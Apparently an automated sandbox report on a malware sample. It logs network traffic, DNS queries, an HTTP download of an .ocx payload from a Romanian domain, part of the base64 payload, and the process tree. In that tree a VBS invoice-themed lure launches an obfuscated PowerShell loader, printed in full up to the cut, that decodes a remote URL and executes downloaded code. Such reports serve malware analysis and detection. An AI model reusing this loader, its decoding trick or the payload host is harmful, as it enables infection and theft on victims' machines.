                                    Oct 21, 2024 13:10:22.904278040 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.904361010 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.931169033 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.931360960 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.931610107 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.931679964 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.932436943 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.932523966 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:22.985222101 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:22.985390902 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.018222094 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.018296003 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.018784046 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.018850088 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.019171953 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.019253016 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.020210028 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.020272970 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.047409058 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.047570944 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.048439980 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.048770905 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.100528955 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.100778103 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.100790024 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.100848913 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.133749962 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.133827925 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.133863926 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.134010077 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.135013103 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.135073900 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.135653973 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.135826111 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.161998034 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.162146091 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.162770033 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.162837029 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.215475082 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.215770006 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.216099977 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.216221094 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.248847008 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.248946905 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.249154091 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.249331951 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.250031948 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.250097990 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.250169039 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.250688076 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.277139902 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.277270079 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.277592897 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.277688026 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.330710888 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.330781937 CEST44349706188.241.183.45192.168.2.11
                                    Oct 21, 2024 13:10:23.330827951 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.330827951 CEST49706443192.168.2.11188.241.183.45
                                    Oct 21, 2024 13:10:23.333338022 CEST49706443192.168.2.11188.241.183.45
                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 21, 2024 13:10:18.011255980 CEST6208253192.168.2.111.1.1.1
                                    Oct 21, 2024 13:10:18.021697044 CEST53620821.1.1.1192.168.2.11
                                    Oct 21, 2024 13:10:20.871748924 CEST5358953192.168.2.111.1.1.1
                                    Oct 21, 2024 13:10:20.941668987 CEST53535891.1.1.1192.168.2.11
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Oct 21, 2024 13:10:18.011255980 CEST192.168.2.111.1.1.10x9b59Standard query (0)gormezl_6777.6777.6777.677eA (IP address)IN (0x0001)false
                                    Oct 21, 2024 13:10:20.871748924 CEST192.168.2.111.1.1.10x5ab2Standard query (0)orthoimplantcenter.roA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Oct 21, 2024 13:10:16.594485044 CEST1.1.1.1192.168.2.110x53e1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                    Oct 21, 2024 13:10:16.594485044 CEST1.1.1.1192.168.2.110x53e1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                    Oct 21, 2024 13:10:18.021697044 CEST1.1.1.1192.168.2.110x9b59Name error (3)gormezl_6777.6777.6777.677enonenoneA (IP address)IN (0x0001)false
                                    Oct 21, 2024 13:10:20.941668987 CEST1.1.1.1192.168.2.110x5ab2No error (0)orthoimplantcenter.ro188.241.183.45A (IP address)IN (0x0001)false
                                    • orthoimplantcenter.ro
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.1149706188.241.183.454437660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-10-21 11:10:21 UTC177OUTGET /Bestyret.ocx HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                    Host: orthoimplantcenter.ro
                                    Connection: Keep-Alive
                                    2024-10-21 11:10:22 UTC209INHTTP/1.1 200 OK
                                    Date: Mon, 21 Oct 2024 11:10:22 GMT
                                    Server: Apache
                                    Upgrade: h2,h2c
                                    Connection: Upgrade, close
                                    Last-Modified: Mon, 21 Oct 2024 07:16:44 GMT
                                    Accept-Ranges: bytes
                                    Content-Length: 487916
                                    2024-10-21 11:10:22 UTC7983INData Raw: 63 51 47 62 63 51 47 62 75 31 32 30 48 51 44 72 41 71 37 73 36 77 4c 30 58 67 4e 63 4a 41 52 78 41 5a 76 72 41 73 30 58 75 61 78 30 6d 4d 6e 72 41 76 4d 56 36 77 4c 62 6f 49 48 78 6d 44 6f 45 51 33 45 42 6d 2b 73 43 37 5a 57 42 38 54 52 4f 6e 49 72 72 41 71 31 2f 63 51 47 62 36 77 4b 33 4f 2b 73 43 45 61 75 36 4c 75 34 32 7a 33 45 42 6d 33 45 42 6d 33 45 42 6d 33 45 42 6d 7a 48 4b 36 77 4b 55 4c 33 45 42 6d 34 6b 55 43 2b 73 43 6a 51 39 78 41 5a 76 52 34 75 73 43 58 54 58 72 41 75 61 37 67 38 45 45 36 77 4c 49 41 33 45 42 6d 34 48 35 59 2b 37 31 41 48 7a 4c 36 77 4c 63 4a 58 45 42 6d 34 74 45 4a 41 54 72 41 75 50 49 63 51 47 62 69 63 4e 78 41 5a 74 78 41 5a 75 42 77 30 58 5a 61 41 44 72 41 70 59 56 63 51 47 62 75 6d 73 41 48 6e 74 78 41 5a 76 72 41 70 69
                                    Data Ascii: cQGbcQGbu120HQDrAq7s6wL0XgNcJARxAZvrAs0Xuax0mMnrAvMV6wLboIHxmDoEQ3EBm+sC7ZWB8TROnIrrAq1/cQGb6wK3O+sCEau6Lu42z3EBm3EBm3EBm3EBmzHK6wKUL3EBm4kUC+sCjQ9xAZvR4usCXTXrAua7g8EE6wLIA3EBm4H5Y+71AHzL6wLcJXEBm4tEJATrAuPIcQGbicNxAZtxAZuBw0XZaADrApYVcQGbumsAHntxAZvrApi
                                    2024-10-21 11:10:22 UTC8000INData Raw: 4b 63 49 6a 55 68 66 51 36 61 4b 2b 75 30 75 4e 39 63 46 48 73 54 36 72 53 37 45 2b 71 30 75 78 50 71 74 4c 73 54 36 72 53 37 45 2b 71 30 75 78 50 71 74 4c 48 54 42 4d 50 65 44 75 34 49 4f 59 4b 66 6a 36 41 55 30 6a 4e 57 66 41 2f 58 6f 38 47 64 4a 7a 4d 74 55 4b 62 49 6b 75 71 48 76 37 46 54 63 58 69 31 45 39 31 69 71 5a 76 4a 7a 58 76 63 47 68 62 78 59 36 73 6b 62 55 36 2b 35 2f 77 4f 75 56 4b 61 6f 79 48 69 62 32 74 65 63 54 78 72 5a 5a 4a 38 55 54 7a 4d 56 6e 38 62 50 39 43 4e 46 78 74 69 62 4f 53 34 30 55 72 46 41 67 6f 79 6f 39 74 75 62 70 6d 34 62 6e 37 54 6d 57 75 71 2b 4e 78 64 32 43 67 2b 55 43 72 47 46 4e 79 56 4c 4a 53 66 69 6e 2b 67 32 58 4b 6d 61 46 5a 30 73 38 4e 36 71 4d 55 43 5a 4a 41 35 62 76 58 4d 4b 6a 45 76 66 38 61 71 79 63 56 30 63
                                    Data Ascii: KcIjUhfQ6aK+u0uN9cFHsT6rS7E+q0uxPqtLsT6rS7E+q0uxPqtLHTBMPeDu4IOYKfj6AU0jNWfA/Xo8GdJzMtUKbIkuqHv7FTcXi1E91iqZvJzXvcGhbxY6skbU6+5/wOuVKaoyHib2tecTxrZZJ8UTzMVn8bP9CNFxtibOS40UrFAgoyo9tubpm4bn7TmWuq+Nxd2Cg+UCrGFNyVLJSfin+g2XKmaFZ0s8N6qMUCZJA5bvXMKjEvf8aqycV0c
                                    2024-10-21 11:10:22 UTC8000INData Raw: 50 71 74 4c 62 7a 77 31 54 7a 6a 38 38 69 35 6c 4e 71 62 48 32 6e 69 76 6d 79 44 4a 39 62 47 7a 4f 6e 76 5a 2b 4d 76 76 31 69 6b 42 74 34 2b 78 50 71 74 4c 73 54 36 72 53 37 45 2b 71 30 75 78 50 71 74 4c 73 54 36 72 53 37 45 2b 71 30 74 33 4e 2f 7a 41 44 50 6c 4f 4b 74 6e 4f 7a 44 41 48 31 57 4b 42 74 59 34 35 36 73 64 41 5a 4f 68 2f 34 72 74 4c 6a 54 72 44 70 37 45 2b 71 30 75 78 50 71 74 4c 73 54 36 72 53 37 45 2b 71 30 75 78 50 71 74 4c 73 54 36 72 53 31 4f 47 32 6b 47 78 74 76 55 2b 68 78 43 64 57 37 45 2b 71 61 43 65 68 75 70 59 45 4c 41 7a 57 37 42 38 53 70 75 6d 71 4d 65 63 49 32 45 4a 64 77 64 44 57 63 68 46 36 35 45 56 65 77 34 64 74 62 5a 41 77 67 58 44 47 53 64 76 76 30 69 38 4e 6c 6d 79 49 63 4b 47 64 56 6c 52 7a 45 43 4b 43 4c 73 67 52 72 67
                                    Data Ascii: PqtLbzw1Tzj88i5lNqbH2nivmyDJ9bGzOnvZ+Mvv1ikBt4+xPqtLsT6rS7E+q0uxPqtLsT6rS7E+q0t3N/zADPlOKtnOzDAH1WKBtY456sdAZOh/4rtLjTrDp7E+q0uxPqtLsT6rS7E+q0uxPqtLsT6rS1OG2kGxtvU+hxCdW7E+qaCehupYELAzW7B8SpumqMecI2EJdwdDWchF65EVew4dtbZAwgXDGSdvv0i8NlmyIcKGdVlRzECKCLsgRrg
                                    2024-10-21 11:10:22 UTC8000INData Raw: 50 71 75 71 70 79 43 58 2b 37 62 6e 5a 69 43 73 4b 77 74 44 74 67 4e 74 54 71 53 64 68 69 78 71 67 4b 37 2b 45 79 56 32 62 76 78 38 53 66 33 76 4a 69 65 63 37 38 53 2b 67 32 53 38 44 30 62 33 47 6d 75 4c 65 49 4f 2f 6b 5a 7a 31 48 57 77 56 62 6c 2b 58 74 44 2b 41 56 4e 51 49 74 78 57 41 6c 43 45 74 7a 66 39 6e 67 62 32 31 39 36 6e 7a 42 6c 77 64 76 33 33 48 52 34 57 7a 79 55 34 45 6e 37 62 47 58 51 57 61 62 47 42 48 48 62 53 6b 39 51 46 58 47 33 65 52 46 72 4c 55 71 37 54 30 43 73 67 42 47 59 5a 7a 37 49 50 71 5a 58 72 4d 64 4d 6f 71 57 39 32 50 50 48 53 5a 6b 64 2f 66 46 43 2b 53 39 39 6a 75 71 59 65 45 72 4f 2b 74 4b 75 55 68 74 76 69 43 67 6c 6c 76 36 54 6d 57 76 6f 39 70 78 4b 5a 4d 67 6d 6b 61 6e 42 51 6c 79 69 36 52 6a 73 75 34 38 58 39 72 4d 54 78
                                    Data Ascii: PquqpyCX+7bnZiCsKwtDtgNtTqSdhixqgK7+EyV2bvx8Sf3vJiec78S+g2S8D0b3GmuLeIO/kZz1HWwVbl+XtD+AVNQItxWAlCEtzf9ngb2196nzBlwdv33HR4WzyU4En7bGXQWabGBHHbSk9QFXG3eRFrLUq7T0CsgBGYZz7IPqZXrMdMoqW92PPHSZkd/fFC+S99juqYeErO+tKuUhtviCgllv6TmWvo9pxKZMgmkanBQlyi6Rjsu48X9rMTx
                                    2024-10-21 11:10:22 UTC8000INData Raw: 2b 76 7a 4f 5a 79 51 71 32 49 52 41 2f 58 35 51 43 42 32 56 43 6b 48 32 6d 77 47 4c 65 79 2b 6c 2f 43 41 43 6d 66 56 69 6a 58 70 48 39 51 70 6a 67 71 77 68 52 31 69 7a 66 51 6c 44 41 52 34 70 79 36 55 71 30 64 6e 71 4d 5a 39 4b 2f 30 4f 78 50 51 74 73 4c 54 4b 70 62 57 63 36 72 30 75 7a 78 67 4d 31 62 52 76 74 72 46 77 52 4b 31 47 32 2b 6b 44 48 51 47 79 73 6a 4c 65 5a 32 67 4c 76 54 49 7a 58 6c 51 44 66 72 4e 7a 53 36 44 65 4e 75 66 71 31 69 69 48 2f 4f 31 30 5a 66 38 6a 6e 31 66 67 6d 35 61 4e 4e 4b 6e 31 41 50 34 57 4e 35 4f 73 41 4b 2b 56 54 61 2f 39 6d 78 78 2f 57 39 6a 55 74 6f 73 66 56 53 45 6b 50 7a 67 31 56 73 69 41 58 50 7a 6c 74 64 66 52 57 66 55 78 31 41 74 79 67 70 7a 6c 76 6f 4a 65 49 30 55 77 56 47 6f 77 69 68 78 70 74 6e 4b 46 63 6a 46 38
                                    Data Ascii: +vzOZyQq2IRA/X5QCB2VCkH2mwGLey+l/CACmfVijXpH9QpjgqwhR1izfQlDAR4py6Uq0dnqMZ9K/0OxPQtsLTKpbWc6r0uzxgM1bRvtrFwRK1G2+kDHQGysjLeZ2gLvTIzXlQDfrNzS6DeNufq1iiH/O10Zf8jn1fgm5aNNKn1AP4WN5OsAK+VTa/9mxx/W9jUtosfVSEkPzg1VsiAXPzltdfRWfUx1AtygpzlvoJeI0UwVGowihxptnKFcjF8
                                    2024-10-21 11:10:22 UTC8000INData Raw: 71 47 4d 57 39 65 6e 4d 74 6d 48 64 41 57 61 45 54 45 41 4e 2f 36 77 45 37 37 45 36 71 30 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                    Data Ascii: qGMW9enMtmHdAWaETEAN/6wE77E6q0gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                    2024-10-21 11:10:22 UTC8000INData Raw: 69 35 75 36 31 47 42 56 46 36 58 4b 66 55 79 75 78 41 74 50 2b 7a 6c 32 69 53 4b 5a 36 55 77 50 4d 6a 49 45 44 7a 6b 58 56 61 38 77 43 57 39 50 2f 38 79 58 78 65 55 58 31 30 57 33 67 2b 62 64 59 68 43 46 6e 55 36 53 7a 77 59 78 4d 4e 69 47 65 43 2b 57 44 62 38 69 45 37 79 71 4d 72 63 2b 32 4b 50 48 5a 45 50 74 72 4e 43 7a 72 52 57 32 4f 45 66 4d 75 46 43 73 37 6c 63 53 6f 49 57 56 4f 46 59 62 77 67 52 4d 57 52 66 47 45 65 6f 65 2b 47 72 39 76 37 4a 30 78 35 61 73 66 59 34 70 4b 51 6c 58 58 68 56 36 64 36 33 36 6b 32 50 64 4f 38 34 4e 56 56 71 7a 72 45 73 35 62 59 48 71 55 30 6c 4d 46 35 43 55 77 61 68 30 32 57 77 35 47 6f 45 2b 4b 64 6c 32 73 7a 67 31 64 68 5a 6a 7a 35 58 44 69 78 51 59 44 68 66 4d 30 55 44 77 73 54 6b 49 67 59 4c 72 2b 6a 41 63 4c 35 6a
                                    Data Ascii: i5u61GBVF6XKfUyuxAtP+zl2iSKZ6UwPMjIEDzkXVa8wCW9P/8yXxeUX10W3g+bdYhCFnU6SzwYxMNiGeC+WDb8iE7yqMrc+2KPHZEPtrNCzrRW2OEfMuFCs7lcSoIWVOFYbwgRMWRfGEeoe+Gr9v7J0x5asfY4pKQlXXhV6d636k2PdO84NVVqzrEs5bYHqU0lMF5CUwah02Ww5GoE+Kdl2szg1dhZjz5XDixQYDhfM0UDwsTkIgYLr+jAcL5j
                                    2024-10-21 11:10:22 UTC8000INData Raw: 2b 73 45 70 2b 42 56 35 67 74 4c 44 4a 2b 58 45 66 74 4d 35 56 2f 56 78 4c 6e 4d 72 7a 66 2b 41 68 6f 34 6f 2b 66 4c 54 6d 64 30 31 66 78 2b 6c 77 39 75 56 6f 35 69 5a 6b 79 74 34 70 36 68 45 57 6b 6a 65 79 78 6a 2f 6b 37 6b 2b 71 57 7a 59 64 70 64 4c 39 56 4b 72 53 37 45 2b 71 30 75 78 50 71 74 4c 73 54 36 72 53 37 45 2b 71 30 75 78 50 71 74 4c 73 54 34 65 48 74 45 59 4f 51 4d 52 56 63 38 63 51 78 5a 6e 6c 55 41 41 36 52 73 56 34 49 55 66 61 54 61 72 53 42 4a 4f 42 31 75 79 6e 6d 65 50 6f 54 32 59 63 75 39 75 62 2f 48 55 70 7a 65 52 4b 52 4a 63 76 63 7a 62 36 4d 4a 38 63 36 33 61 6a 71 6a 4d 4f 69 33 4b 53 55 54 77 6a 38 5a 73 6a 47 33 6c 5a 73 57 39 6d 58 59 72 6a 66 30 6d 42 34 51 6b 6e 6a 48 52 75 33 70 32 58 50 2f 76 6d 39 46 34 43 4b 63 53 38 49 4d
                                    Data Ascii: +sEp+BV5gtLDJ+XEftM5V/VxLnMrzf+Aho4o+fLTmd01fx+lw9uVo5iZkyt4p6hEWkjeyxj/k7k+qWzYdpdL9VKrS7E+q0uxPqtLsT6rS7E+q0uxPqtLsT4eHtEYOQMRVc8cQxZnlUAA6RsV4IUfaTarSBJOB1uynmePoT2Ycu9ub/HUpzeRKRJcvczb6MJ8c63ajqjMOi3KSUTwj8ZsjG3lZsW9mXYrjf0mB4QknjHRu3p2XP/vm9F4CKcS8IM
                                    2024-10-21 11:10:22 UTC8000INData Raw: 77 72 36 73 72 65 7a 2b 41 63 4d 5a 49 30 2b 37 53 7a 46 63 64 50 71 6c 7a 64 75 72 54 36 66 6e 5a 51 36 36 49 57 4b 43 4a 76 51 52 44 4d 66 2b 33 50 33 42 49 61 67 63 72 4c 58 35 79 6c 6a 6c 55 4a 42 75 6f 41 67 30 75 47 5a 36 61 41 58 66 4f 46 33 37 73 54 36 70 2b 37 45 2b 71 33 57 69 30 67 64 4c 73 46 63 78 58 4e 68 63 68 62 39 4e 4e 71 74 4b 36 38 52 43 58 45 53 41 72 46 44 52 70 32 58 70 74 75 66 6e 72 6e 46 63 6a 33 46 59 44 4a 7a 61 32 39 35 57 4d 6a 4b 33 6a 37 34 34 2b 6a 4f 78 53 6c 4f 6d 71 46 74 5a 6a 54 53 52 50 6b 6e 45 72 2f 30 38 79 73 71 38 49 6a 4c 37 31 62 4c 57 75 33 53 73 51 68 30 7a 64 67 47 32 6c 41 36 52 55 71 79 50 49 36 35 56 70 71 51 6f 42 49 7a 63 37 63 76 30 77 78 77 73 44 77 4d 56 59 34 56 4f 4d 36 36 55 2f 67 38 32 57 56 4d
                                    Data Ascii: wr6srez+AcMZI0+7SzFcdPqlzdurT6fnZQ66IWKCJvQRDMf+3P3BIagcrLX5yljlUJBuoAg0uGZ6aAXfOF37sT6p+7E+q3Wi0gdLsFcxXNhchb9NNqtK68RCXESArFDRp2XptufnrnFcj3FYDJza295WMjK3j744+jOxSlOmqFtZjTSRPknEr/08ysq8IjL71bLWu3SsQh0zdgG2lA6RUqyPI65VpqQoBIzc7cv0wxwsDwMVY4VOM66U/g82WVM
                                    2024-10-21 11:10:22 UTC8000INData Raw: 64 69 74 62 73 78 6a 64 79 37 55 2b 71 33 65 79 58 6d 74 4c 73 54 36 72 53 37 45 2b 71 30 75 78 50 71 74 4c 73 54 36 72 53 37 45 2b 71 30 75 78 50 71 76 73 69 44 39 74 35 79 44 43 41 33 35 52 73 6d 4f 75 6f 41 72 33 79 59 48 31 68 49 59 57 45 34 46 73 76 48 47 61 65 73 74 4a 36 43 4f 4f 4b 53 48 48 49 6b 73 4b 66 6e 6c 4c 49 59 39 30 63 34 45 53 35 34 37 7a 52 52 6b 43 45 5a 39 77 48 30 33 4d 53 35 71 45 37 44 64 70 50 46 32 58 71 7a 57 55 66 31 66 4c 7a 57 38 51 33 63 75 31 50 71 6f 4e 56 35 75 78 62 79 38 35 44 7a 43 39 6c 56 31 4d 74 6d 64 4e 77 4f 63 61 37 4f 53 38 53 35 74 32 4d 45 6e 30 42 4a 48 42 64 73 63 6f 38 47 57 44 6e 56 58 32 45 50 4d 6d 61 64 76 64 6d 6f 73 72 4e 4f 57 72 30 72 68 52 49 70 64 57 6f 56 6d 77 48 6c 69 78 70 2f 64 37 37 4f 44
                                    Data Ascii: ditbsxjdy7U+q3eyXmtLsT6rS7E+q0uxPqtLsT6rS7E+q0uxPqvsiD9t5yDCA35RsmOuoAr3yYH1hIYWE4FsvHGaestJ6COOKSHHIksKfnlLIY90c4ES547zRRkCEZ9wH03MS5qE7DdpPF2XqzWUf1fLzW8Q3cu1PqoNV5uxby85DzC9lV1MtmdNwOca7OS8S5t2MEn0BJHBdsco8GWDnVX2EPMmadvdmosrNOWr0rhRIpdWoVmwHlixp/d77OD


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:1
                                    Start time:07:10:15
                                    Start date:21/10/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs"
                                    Imagebase:0x7ff645f90000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:07:10:16
                                    Start date:21/10/2024
                                    Path:C:\Windows\System32\PING.EXE
                                    Wow64 process (32bit):false
                                    Commandline:ping gormezl_6777.6777.6777.677e
                                    Imagebase:0x7ff655de0000
                                    File size:22'528 bytes
                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:3
                                    Start time:07:10:16
                                    Start date:21/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff68cce0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:07:10:17
                                    Start date:21/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk 